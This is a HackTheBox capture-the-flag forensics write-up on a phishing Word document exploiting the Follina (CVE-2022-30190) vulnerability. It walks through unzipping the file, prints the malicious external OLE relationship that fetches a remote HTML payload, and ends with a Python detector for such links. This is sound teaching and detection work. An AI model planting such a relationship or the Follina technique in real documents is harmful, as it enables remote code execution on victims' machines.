forensics, free, medium

Diagnostic

hackthebox

Task: Analyze a malicious Office document from a phishing campaign to extract the hidden flag. Solution: Unzip the DOCX to find an external OLE object referencing an HTML file that exploits CVE-2022-30190 (Follina) via ms-msdt:/ protocol, decode the base64 PowerShell payload, and deobfuscate format string reordering to reveal the flag embedded in the malware filename.

$ ls tags/ techniques/
base64_decoding  msdt_protocol_handler_rce  external_ole_reference  powershell_format_string_deobfuscation


Diagnostic - HackTheBox

Description

Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document. Take a look and figure out what's going on.

Analysis

This challenge involves analyzing a malicious Office document that exploits CVE-2022-30190 (Follina vulnerability). The attack chain:

  1. Phishing email with link to malicious .doc file
  2. Document contains external OLE object reference to HTML file
  3. HTML file uses ms-msdt:/ protocol handler to execute PowerShell
  4. PowerShell payload is base64 encoded and uses format string obfuscation
  5. Flag is hidden in the filename of the downloaded malware

Solution

Step 1: Download the malicious document

Since the DNS name no longer resolves, send the Host header explicitly and reach the server by IP:

curl -H "Host: diagnostic.htb" http://94.237.59.242:45434/layoffs.doc -o layoffs.doc

Step 2: Identify file type

file layoffs.doc
# Output: Zip archive data, at least v2.0 to extract

The .doc extension is misleading - this is actually a DOCX file (Office Open XML format, which is a ZIP archive).

Step 3: Extract and analyze document structure

unzip layoffs.doc -d extracted/

Directory structure:

extracted/
├── [Content_Types].xml
├── _rels/
├── docProps/
└── word/
    ├── document.xml
    ├── _rels/
    │   └── document.xml.rels
    └── ...

Step 4: Find external OLE object reference

word/document.xml contains an OLEObject with suspicious attributes:

  • Type="Link" - the object is an external reference, not embedded content
  • ProgID="htmlfile" - the target will be handled by the HTML handler
  • r:id="rId996" - references relationship rId996

In word/_rels/document.xml.rels:

<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://diagnostic.htb/223_index_style_fancy.html!" TargetMode="External"/>

Key indicator: External OLE object pointing to HTML file - classic Follina setup.
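As an added example (not part of the writeup), a Python check that performs Step 4 mechanically: it opens a DOCX as a ZIP, pulls every oleObject relationship with TargetMode="External" out of the .rels parts, and joins each with the Type/ProgID of the OLEObject in document.xml that uses that relationship id. The embedded DOCX parts are constructed to mirror the layoffs.doc structure above; the result keys and the follina_like label are my own naming.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
O_NS = "urn:schemas-microsoft-com:office:office"
OLE_REL = R_NS + "/oleObject"  # relationship type used for OLE objects

# Constructed sample parts mirroring layoffs.doc: an OLEObject with Type="Link"
# and ProgID="htmlfile" bound to rId996, whose relationship is an external
# HTML target ending in "!".
SAMPLE_DOCUMENT = f"""<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"
 xmlns:o="{O_NS}" xmlns:r="{R_NS}"><w:body><w:p><w:r><w:object>
 <o:OLEObject Type="Link" ProgID="htmlfile" r:id="rId996" UpdateMode="Always"/>
</w:object></w:r></w:p></w:body></w:document>"""
SAMPLE_RELS = f"""<Relationships xmlns="{REL_NS}">
 <Relationship Id="rId1" Type="{R_NS}/styles" Target="styles.xml"/>
 <Relationship Id="rId996" Type="{OLE_REL}"
  Target="http://diagnostic.htb/223_index_style_fancy.html!" TargetMode="External"/>
</Relationships>"""

def build_sample_docx() -> bytes:
    """Pack the constructed parts into a ZIP, which is all a DOCX is."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", SAMPLE_DOCUMENT)
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()

def find_external_ole_links(docx_bytes: bytes) -> list[dict]:
    """Report every oleObject relationship with TargetMode="External",
    joined with the Type/ProgID of the OLEObject in document.xml using it."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        objects = {}  # relationship id -> (Type, ProgID) from document.xml
        if "word/document.xml" in z.namelist():
            doc = ET.fromstring(z.read("word/document.xml"))
            for ole in doc.iter(f"{{{O_NS}}}OLEObject"):
                objects[ole.get(f"{{{R_NS}}}id")] = (ole.get("Type", ""), ole.get("ProgID", ""))
        findings = []
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(z.read(name)).iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    typ, progid = objects.get(rel.get("Id"), ("", ""))
                    findings.append({"part": name, "id": rel.get("Id"), "target": rel.get("Target"),
                                     "type": typ, "progid": progid,
                                     "follina_like": typ == "Link" and progid.lower() == "htmlfile"})
    return findings
```

Run it over the output of build_sample_docx() (or any real DOCX read as bytes) and each finding names the .rels part, the relationship id, the external target and whether the linked object is handled by htmlfile.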

...
